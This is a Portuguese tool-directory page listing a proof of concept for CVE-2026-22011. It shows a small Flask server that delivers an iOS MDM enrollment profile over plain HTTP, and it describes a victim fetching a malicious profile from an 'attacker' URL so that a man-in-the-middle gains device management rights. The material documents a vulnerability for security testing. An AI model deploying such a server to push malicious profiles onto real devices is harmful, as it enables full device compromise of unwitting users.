Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP — Servidor Flask de PoC para CVE-2026-22011 que serve um perfil malicioso de inscrição MDM iOS via HTTP, permitindo interceptação man-in-the-middle e comprometimento do dispositivo. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http
Segurança iOSAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoSegurança Móvel
GitHubgeorge0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http

CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP

Servidor Flask de PoC para CVE-2026-22011 que serve um perfil malicioso de inscrição MDM iOS via HTTP, permitindo interceptação man-in-the-middle e comprometimento do dispositivo.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
8há 1 mêsAinda não revisado
Compartilhar

CVE-2026-22011 – Entrega de Perfil MDM do iOS via HTTP

Código do Programa (servidor MDM em Python Flask)

root@kitploit:~
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file

app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
    # Vulnerability: profile delivered without HTTPS
    return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

CVE-2026-22011 – Entrega de Perfil MDM do iOS via HTTP

Severity: High

Visão Geral

Um perfil de inscrição MDM é servido via HTTP simples, sem criptografia ou verificação de assinatura digital. Um atacante na mesma rede pode interceptar a solicitação e substituir o perfil por um malicioso, obtendo privilégios de gerenciamento de dispositivo.

Detalhes da Vulnerabilidade

  • Tipo: Homem no Meio / Transporte Inseguro
  • Impacto: Comprometimento total do dispositivo via MDM malicioso.
  • Causa Raiz: A URL do perfil é HTTP, e o iOS não impõe HTTPS para inscrição MDM (depende da configuração), permitindo a interceptação.

Demonstração do Exploit

Inicie o servidor HTTP do atacante:

root@kitploit:~
python mdm_server.py

Quando a vítima acessa http://attacker/enroll.mobileconfig, o perfil malicioso é baixado.

Baixar ferramenta